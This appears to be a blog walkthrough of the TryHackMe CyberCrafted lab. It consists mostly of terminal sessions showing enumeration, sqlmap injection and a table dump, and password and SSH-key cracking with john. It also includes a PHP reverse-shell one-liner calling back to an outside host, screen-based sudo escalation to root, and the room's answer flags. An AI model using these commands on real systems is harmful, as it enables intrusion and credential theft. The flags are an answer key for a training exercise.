Full TryhackMe CyberCrafted Walkthrough, learn to root the machine and get all the flags. CyberCraft room uses a Minecraft server to simulate the attack.

TryHackMe CyberCrafted

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ /usr/bin/rustscan --ulimit 5000 -a 10.10.90.255 -- -sC -sV

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ firefox http://cybercrafted.thm

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ gobuster dir -u http://cybercrafted.thm -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt -o default_output.txt

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ gobuster dir -u http://admin.cybercrafted.thm -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt -o admin_output.txt

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ gobuster dir -u http://store.cybercrafted.thm -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt -o store_output.txt

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ sqlmap -r login_req.txt -p uname --file-read=index.php --batch

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ sqlmap -r search_req.txt -p search --users

database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'mysql.session'@'localhost'
[*] 'mysql.sys'@'localhost'
[*] 'root'@'localhost'

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ sqlmap -r search_req.txt -p search --dbs

available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] webapp

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ sqlmap -r search_req.txt -p search -D webapp --tables

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ sqlmap -r search_req.txt -p search -D webapp -T admin --dump

Database: webapp
Table: admin
[2 entries]
+----+------------------------------------------+---------------------+
| id | hash                                     | user                |
+----+------------------------------------------+---------------------+
| 1  | 88b949dd5cdfbecb9f2ecbbfa24e5974234e7c01 | xXUltimateCreeperXx |
| 4  | THM{bbe31590-RFS-a62d9b195001f75008}    | web_flag            |
+----+------------------------------------------+---------------------+

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ john user_xXUltimateCreeperXx_hash.txt -w=/home/kali/Desktop/Utilities/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 AVX 4x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
diamond123456789 (?)     
1g 0:00:00:00 DONE (2021-11-24 06:46) 1.724g/s 14892Kp/s 14892Kc/s 14892KC/s diamond124..diamond123*
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed.


┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ firefox http://admin.cybercrafted.thm/panel.php

php -r '$sock=fsockopen("10.8.154.49",4444);exec("/bin/bash <&3 >&3 2>&3");'

┌──(kali㉿PopLabSec)-[~/Desktop/Utilities]
└─$ nc -lnp 4445

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ vi rsa_priv_crackit.txt

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ /usr/share/john/ssh2john.py rsa_priv_crackit.txt > rsa_priv_to_john.txt

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ john rsa_priv_to_john.txt -w=/home/kali/Desktop/Utilities/rockyou.txt --format=SSH

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ john --wordlist=/home/kali/Desktop/Utilities/rockyou.txt --format=SSH rsa_priv_to_john.hashes

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ john rsa_priv_to_john.hashes --show                                                          
?:creepin--RFS

1 password hash cracked, 0 left

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ chmod 400 rsa_priv_crackit.txt

┌──(kali㉿PopLabSec)-[~/Desktop/CTFs/TryHackMe/THM_CyberCrafted]
└─$ ssh xxultimatecreeperxx@cybercrafted.thm -i rsa_priv_crackit.txt
Enter passphrase for key 'rsa_priv_crackit.txt': - creepin--RFS
xxultimatecreeperxx@cybercrafted:~$

xxultimatecreeperxx@cybercrafted:/opt/minecraft/cybercrafted/plugins$ cd LoginSystem/
xxultimatecreeperxx@cybercrafted:/opt/minecraft/cybercrafted/plugins/LoginSystem$ ls
language.yml  log.txt  passwords.yml  settings.yml

xxultimatecreeperxx@cybercrafted:/opt/minecraft/cybercrafted/plugins/LoginSystem$ cat log.txt 

[2021/06/27 11:25:07] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:25:16] cybercrafted registered. PW: JavaEdition>Bedrock
[2021/06/27 11:46:30] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:47:34] cybercrafted logged in. PW: JavaEdition>Bedrock
[2021/06/27 11:52:13] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:57:29] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:57:54] cybercrafted logged in. PW: JavaEdition>Bedrock
[2021/06/27 11:58:38] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:58:46] cybercrafted logged in. PW: JavaEdition>Bedrock
[2021/06/27 11:58:52] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:59:01] madrinch logged in. PW: Password123


[2021/10/15 17:13:45] [BUKKIT-SERVER] Startet LoginSystem!
[2021/10/15 20:36:21] [BUKKIT-SERVER] Startet LoginSystem!
[2021/10/15 21:00:43] [BUKKIT-SERVER] Startet LoginSystem!
[2021/11/24 09:57:49] [BUKKIT-SERVER] Startet LoginSystem!

xxultimatecreeperxx@cybercrafted:/opt/minecraft/cybercrafted/plugins/LoginSystem$ su - cybercrafted
Password: 
cybercrafted@cybercrafted:~$

cybercrafted@cybercrafted:~$ sudo -l
[sudo] password for cybercrafted: 
Sorry, try again.
[sudo] password for cybercrafted: 
Matching Defaults entries for cybercrafted on cybercrafted:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cybercrafted may run the following commands on cybercrafted:
    (root) /usr/bin/screen -r cybercrafted

cybercrafted@cybercrafted:~$ sudo /usr/bin/screen -r cybercrafted

ctrl+a+c

# id
uid=0(root) gid=1002(cybercrafted) groups=1002(cybercrafted)
#

Ready..Set.. Go

Answer the questions below

How many ports are open?

What service runs on the highest port?

minecraft

Any subdomains? (Alphabetical order)

admin store www

On what page did you find the vulnerability?

search.php

What is the admin’s username? (Case-sensitive)

xXUltimateCreeperXx

What is the web flag?

THM{bbe31590603--RFS--195001f75008}

Can you get the Minecraft server flag?

THM{ba93767ae3--RFS--99680040a0c99e}

What is the name of the sketchy plugin?

LoginSystem

What is the user’s flag?

THM{b4aa20aaf0--RFS--ab0325b24a45ca}

Finish the job and give me the root flag!

THM{8bb1eda065--RFS--45568350a70}

Categorized in:

TryHackMe Hacking Playgrounds

TryHackMe CyberCrafted Walkthrough Free Room

TryHackMe CyberCrafted

Other Stories

Gobuster Tutorial: Web Directory Enumeration

Complete TryHackMe Jeff Walkthrough: Free Room

HTB Napper Machine – Full Writeup

Protected: HTB Authority Machine – CompleteWriteup

Protected: HTB Manager Machine – Full Writeup

Don’t miss these tips!

HTB Napper Machine – Full Writeup

Protected: HTB Authority Machine – CompleteWriteup

Protected: HTB Manager Machine – Full Writeup

Protected: HTB Codify Machine – Full Writeup

TryHackMe CyberCrafted

Related Articles

Other Stories

Gobuster Tutorial: Web Directory Enumeration

Complete TryHackMe Jeff Walkthrough: Free Room